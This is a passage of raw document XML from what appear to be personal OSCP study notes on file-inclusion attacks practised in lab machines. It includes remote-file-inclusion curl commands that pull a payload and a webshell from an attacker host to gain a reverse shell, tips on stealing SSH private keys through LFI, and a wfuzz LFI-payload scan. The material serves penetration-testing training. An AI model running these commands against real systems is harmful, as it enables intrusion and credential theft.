                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image140.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId557"/>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C01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, curl step 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i http://192.168.212.53:4443/site/index.php?page=http://192.168.45.195/step2.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="508000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="371" name="image368.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image368.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId558"/>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C04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It should hang</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check python host to make sure it got both steps and rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1244600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="324" name="image331.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image331.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId559"/>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1C07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then check listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0A">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C0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 9.2.3. Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it's pretty minimal. It's just LFI but you can access like a python host on your local Kali. And it's often not able to be used since you need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be enabled in order to do it on PHP site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "http://mountaindesserts.com/meteor/index.php?page=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.119.3/simple-backdoor.php&amp;cmd=ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This accessed a backdoor (webshell) that was hosted by python server on Kali, and then ran "ls" on it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_758l5jdwkfiq" w:id="233"/>
      <w:bookmarkEnd w:id="233"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C18">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When doing LFI, and doing stuff like stealing SSH private keys, it's not a bad idea to use CURL since it most likely formats the private key (and other) output better than the website does</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One big example of LFI was in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on machine 192.168.xxx.245</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This LFI came from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache httpd 2.4.49 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI exploit, where we had to use special encoding to get past the security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More of this can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Special Characters (and Apache httpd 2.4.49 exploit)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section found below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We used it to get SSH key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But id_rsa wasn't there. But instead of quitting, we decided to look for other private key formats and we found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/anita/.ssh/id_ecdsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI also seen on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.246 too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try looking at the SSH private key, as instructed in the "parameter fuzzing" section of FFUF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C26">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get LFI from parameter fuzzing or another method, you can check to see which file paths you can access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/LFI\ payloads.txt --hw 0 http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.167.80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console/file.php?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=FUZZ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId560">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">log poisoning</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is another big attack vector as a result of LFI</w:t>
      </w:r>
    </w:p>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example for Local File Inclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get the responses in a nice format, use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C2F">
